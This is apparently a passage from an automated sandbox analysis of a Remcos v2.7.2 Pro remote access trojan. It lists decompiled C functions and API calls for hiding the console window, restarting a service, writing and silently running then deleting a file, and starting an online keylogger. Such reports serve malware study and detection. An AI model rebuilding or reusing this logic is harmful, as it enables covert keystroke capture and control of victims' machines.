                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                          • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                          • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                          • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                          • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                          • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                          • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                          • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                          • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                        • String ID:
                                        • API String ID: 3444260106-0
                                        • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                        • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E004117C7(void* _a4) {
                                        				intOrPtr _v28;
                                        				struct _SERVICE_STATUS _v32;
                                        				short* _t6;
                                        				signed int _t12;
                                        				int _t20;
                                        				void* _t23;
                                        				void* _t24;
                                        
                                        				_t20 = 0;
                                        				_t6 = OpenSCManagerW(0, 0, 0x11);
                                        				_t24 = _t6;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
                                        				if(_t23 != 0) {
                                        					if(ControlService(_t23, 1,  &_v32) != 0) {
                                        						do {
                                        							QueryServiceStatus(_t23,  &_v32);
                                        						} while (_v28 != 1);
                                        						_t12 = StartServiceW(_t23, 0, 0);
                                        						asm("sbb eax, eax");
                                        						_t20 = ( ~_t12 & 0x000000fe) + 3;
                                        					} else {
                                        						_t20 = 2;
                                        					}
                                        					CloseServiceHandle(_t24);
                                        					CloseServiceHandle(_t23);
                                        				} else {
                                        					CloseServiceHandle(_t24);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t20;
                                        			}

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                        • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                        • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                        • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E00413D3D(signed int __edx, intOrPtr _a4) {
                                        				void _v1003;
                                        				char _v1004;
                                        				struct HWND__* _t13;
                                        				signed int _t34;
                                        				signed int _t36;
                                        				unsigned int _t40;
                                        				signed int _t41;
                                        				signed int _t47;
                                        				signed int _t50;
                                        				signed int _t56;
                                        				signed int _t59;
                                        				signed int _t64;
                                        				signed int _t65;
                                        				void* _t91;
                                        				void* _t92;
                                        				void* _t93;
                                        
                                        				_t64 = __edx;
                                        				AllocConsole();
                                        				_t13 =  *0x41c1f8();
                                        				 *0x41c1fc = _t13;
                                        				if(_a4 == 0) {
                                        					ShowWindow(_t13, 0);
                                        				}
                                        				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                        				_v1004 = 0;
                                        				memset( &_v1003, 0, 0xf9 << 2);
                                        				asm("stosw");
                                        				asm("stosb");
                                        				_t65 = _t64 | 0xffffffff;
                                        				asm("repne scasb");
                                        				_t40 =  !_t65;
                                        				_t91 = " * Remcos v" - _t40;
                                        				_t41 = _t40 >> 2;
                                        				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                        				asm("repne scasb");
                                        				_t47 =  !_t65;
                                        				_t92 = "2.7.2 Pro" - _t47;
                                        				_t34 = _t47;
                                        				asm("repne scasb");
                                        				_t50 = _t34 >> 2;
                                        				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                        				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                        				asm("repne scasb");
                                        				_t56 =  !_t65;
                                        				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                        				_t36 = _t56;
                                        				asm("repne scasb");
                                        				_t59 = _t36 >> 2;
                                        				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                        				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                        				return printf( &_v1004);
                                        			}

                                        APIs
                                        • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                        • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                        • freopen.MSVCRT ref: 00413D7C
                                        • printf.MSVCRT ref: 00413E25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocConsoleShowWindowfreopenprintf
                                        • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                        • API String ID: 3419900118-1124569734
                                        • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                        • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E00405BC0(void* __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t8;
                                        				void* _t31;
                                        
                                        				_push(__ecx);
                                        				_t31 = __ecx;
                                        				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                        					 *((char*)(__ecx + 0x3d)) = 1;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                        					E00405DD3(__ecx);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
                                        					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                        						E00405156(_t31);
                                        						if( *_t31 == 0) {
                                        							CreateThread(0, 0, E0040526A, _t31, 0, 0);
                                        						}
                                        						CreateThread(0, 0, E00405299, _t31, 0, 0);
                                        					}
                                        					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
                                        					 *(_t31 + 0x28) = _t8;
                                        				}
                                        				return _t8;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                        • String ID: Online Keylogger Started$[INFO]
                                        • API String ID: 3243250608-3343292223
                                        • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                        • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                        • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                        • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E0040E254(void* __eax, void* __eflags) {
                                        				void* _t7;
                                        				void* _t9;
                                        				void* _t28;
                                        
                                        				_t33 = __eflags;
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                        				E004017DD(_t28 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        Instruction addresses: 0x0040e254 0x0040e25d 0x0040e266 0x0040e273 0x0040e27a 0x0040e286 0x0040e28d 0x0040e29e 0x0040e2aa 0x0040e6a4 0x0040e6ac 0x0040e6b5 0x0040e6c1

                                        APIs
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                        • String ID: name
                                        • API String ID: 4248281052-1579384326
                                        • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                        • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00411AF5(void* __ecx, WCHAR* _a4) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t13;
                                        
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                        				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
                                        				Sleep(0x2710);
                                        				return PlaySoundW(0, 0, 0);
                                        			}

                                        Instruction addresses: 0x00411b08 0x00411b1c 0x00411b22 0x00411b41 0x00411b48 0x00411b58

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
